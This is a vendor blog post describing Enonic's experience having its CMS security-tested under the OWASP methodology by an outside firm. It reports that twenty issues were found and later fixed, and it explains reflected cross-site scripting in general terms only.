Experiences with OWASP-testing

Posted by

    OWASP logo

    The only 100% secure computer is turned off or disconnected from the internet. Unfortunately, this is not an option for a web-server or a CMS. In order to make sure Enonic CMS is at the forefront of the latest developments in this field, we hired an external white hat security expert to test Enonic CMS according to the OWASP testing methodology.

    What is OWASP?

    OWASP, an abbreviation for Open Web Application Security Project, is "an open community dedicated to enabling organizations to conceive, develop, acquire, operate, and maintain applications that can be trusted"[1].  OWASP is also an emerging standard body, with the ASVS, the Application Security Verification Standard[2].  The OWASP testing guide which now has reached version 4.0, provides a methodology for security testing.  It does not simply provide a checklist for testers to sign-off, but aims to "help people understand the what, why, when, where and how of testing their web-applications."[3] 

    At Enonic, we wanted to get some experts to look at our system to determine if there are any security holes.  The OWASP testing guide is a very solid piece of work, so we looked for a white hat security expert that could put our system through the OWASP grinder.  We found the small Norwegian company, Encripto (encripto.no) who did a great job "hacking us".

    How is an OWASP test conducted?

    It is most common to test web-sites.  In the case of Enonic, we wanted our product tested, but Enonic CMS is not accessible, and therefore, have no security issues, untill it is running a web-site.  So, we decided to set up a copy of www.enonic.com, to conduct the OWASP test on.  enonic.com is a very standard web-site that is run on a cluster configuration, with many special features of Enonic CMS in use, so it is a good representation to test on.

    Our white hat security expert hammered away for one week, using a combination of automatic tools and manual testing to find vulnerabilities.

    Results of the testing.

    It turned out that a total of 20 issues were discovered during the testing.  One very interesting finding about these 20 issues, was that some had nothing to do with the Enonic CMS product, but were introduced by the site developer.

    One example of this is how data provided by a user is redisplayed in the result page without careful consideration of what it may contain.  For instance: If a schema allows user to post data to the server that is also displayed directly back to the user, this can allow a hacker to create a link with embedded JavaScript and send it to a possible victim.  When the victim clicks on the link, the result page includes the embedded JavaScript that is now executed on behalf of the victim.  Since it is executed on behalf of the victim, it will have access to possibly sensitive data about the user, that can be exploited by the script.

    Watch this site for an upcoming article about how to develop secure sites and which tools Enonic CMS provide to help developers create secure sites.

    Most of the security issues discovered, were issues that the server could discover, analyze and avoid.  A total of eleven security holes were fixed for the 4.7.6 release and nine for 4.5.9.  Three of these were high risk issues that could have dangerous consequenses if taken advantage of by a hacker.

    Conclusion

    Our experience with OWASP security testing were highly positive.  The OWASP framework is set up to not only check off a list of tests that have been executed, but to build security into the development process and make sure the risks not only are discovered, but understood.  After the test had been conducted, we had a day-long session to go through all the issues that was found, learn why they appear and how to fix them.

    The most severe security issues should now be taken care of in Enonic CMS, but we still plan on having an OWASP test done to every future release, and with our new 5.0 product coming up, this will be very important.  We also recommend everybody who are developing large web sites, or sites with user interaction, to get their sites OWASP tested.

     

    [1] About the Open Web Application Security Project - https://www.owasp.org/index.php/About_OWASP

    [2] The OWASP Application Security Verification Standard Project - https://www.owasp.org/index.php/ASVS

    [3] An Introduction to the OWASP Testing Guide - https://www.owasp.org/index.php/Testing_Guide_Introduction

    Comments